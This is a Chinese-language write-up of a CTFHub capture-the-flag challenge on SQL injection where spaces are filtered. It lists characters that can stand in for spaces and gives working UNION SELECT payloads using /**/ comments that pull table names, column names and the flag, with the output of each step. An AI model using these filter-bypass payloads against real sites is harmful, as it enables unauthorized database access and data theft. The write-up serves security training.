CTFHub_技能树_Web之SQL注入——过滤空格

一般注入语句为

?id&＃61;0 union select database(),user()


由于过滤了空格致使无法执行注入的语句时&＃xff0c;可使用以下字符代替空格&＃xff0c;发挥同样效果

1. ()&＃xff1a;一对圆括号
2. &＃43;&＃xff1a;加号
3. %09、%0a、%0b、%0c、%0d&＃xff1a;TAB水平制表符、换行符、垂直制表符、换页、回车的URL编码形式
4. /**/&＃xff1a;块注释符

依次尝试发现只能使用块注释符替换&＃xff0c;那么开始注入&＃xff1a;

Ⅰ、爆表名

?id&＃61;10/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema&＃61;database()


ID: 1
Data: uphtdswtud,news


Ⅱ、爆列名

0/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name&＃61;&＃39;uphtdswtud&＃39;


ID: 1
Data: katnztegrp


Ⅲ、爆flag

0/**/union/**/select/**/1,katnztegrp/**/from/**/uphtdswtud


ID: 1
Data: ctfhub{b4b4e8cf9f38282496e9776c}